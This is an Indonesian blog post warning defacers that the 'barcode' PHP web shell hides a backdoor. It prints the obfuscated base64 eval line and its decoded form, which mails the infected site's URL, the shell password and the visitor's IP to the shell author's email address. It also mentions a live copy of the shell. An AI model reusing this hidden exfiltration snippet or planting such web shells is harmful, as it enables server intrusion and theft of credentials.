Space Iklan Space Iklan Space Iklan Space Iklan

shell barcode ada keylogger

Bookmark and Share
shell barcode ada keylogger
assalamualaikum :)
kali ini flazer mau berbagi berita soal hacking hmmm pasti nya tau donk para defacer yang suka jumping server :)
ok di sini saya mau memberi berita sedikit buat para pengguna shell barcode yang dari Uzan /  team dari code-security  waahhh saya lihat di balik shell tersebut ada akal busuk nya :) waw apa itu akal busuk nya ???
akal busuk dari kang master uzan ini di shell tersebut di sisipin Keylogger ini gambar hasil saya mendapatkan shell tersebut

percaya atau tidak saya hanya memberi saran kepada kalian
dan saya menemukan pada bagian ini

$shell_data = "JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07DQogaWYoICR2aXNpdGNvdW50ID09ICIiKQ0KIHskdmlzaXRjb3VudCA9IDA7IA0KICR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07IA0KICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KICR0YXJnZXQgPSByYXd1cmxkZWNvZGUoJHdlYi4kaW5qKTsNCiAkYm9keSA9ICJCb3NzLCBhZGEgeWFuZyB0ZWxhaCBtZW5hbmFtIGJhY2tkb29yIGRpIDogICR0YXJnZXQgfCBwYXNzd29yZCA9ICRtZDVfcGFzcyBJUCA9ICR2aXNpdG9yIjsgQG1haWwoInV6YW5jQHltYWlsLmNvbSIsIktleWxvZ2VyIEJhY2tkb29yIiwgIiRib2R5Iik7DQogfSBlbHNlIHsgDQogJHZpc2l0Y291bnQ7IA0KIH0gc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGNvdW50KTs="; eval(base64_decode($shell_data));

dan saya mencoba membuka code tersebut ada akal busuk si uzan ini :D kenapa saya bilang akal busuk ?
dan saya mencoba Decode shell tersebut hasil nya seperti ini

$visitcount = $HTTP_COOKIE_VARS["visits"];
 if( $visitcount == "")
 {$visitcount = 0; 
 $visitor = $_SERVER["REMOTE_ADDR"]; 
 $web = $_SERVER["HTTP_HOST"];
 $inj = $_SERVER["REQUEST_URI"];
 $target = rawurldecode($web.$inj);
 $body = "Boss, ada yang telah menanam backdoor di :  $target | password = $md5_pass IP = $visitor"; @mail("uzanc@ymail.com","Keyloger Backdoor", "$body");
 } else { 
 $visitcount; 
 } setcookie("visits",$visitcount);

waw ada udang di balik minyak goreng :D ternyata saya melihat pada bagian ini 
 $body = "Boss, ada yang telah menanam backdoor di :  $target | password = $md5_pass IP = $visitor"; @mail("uzanc@ymail.com","Keyloger Backdoor", "$body"); 
wahh parah banget ya buat temanĂ‚² yang ingin melihat code yang saya decode bisa langsung ke sini
dan shell yang masih awet di sini : Klik Here
dan saya bukan merusak nama baik si uzan tapi ini kenyataan :) 
buat kalian yang tidak percaya bisa coba Decode Sendiri :) dan lihat hasilĂ‚² nya ^_^
walaupun ini berita sudah basi tapi saya hanya sekedar berbagi info buat baru tau :)
semoga info dari seorang lamer seperti saya bermanfaat ya buat kalian :)
 
beritasehari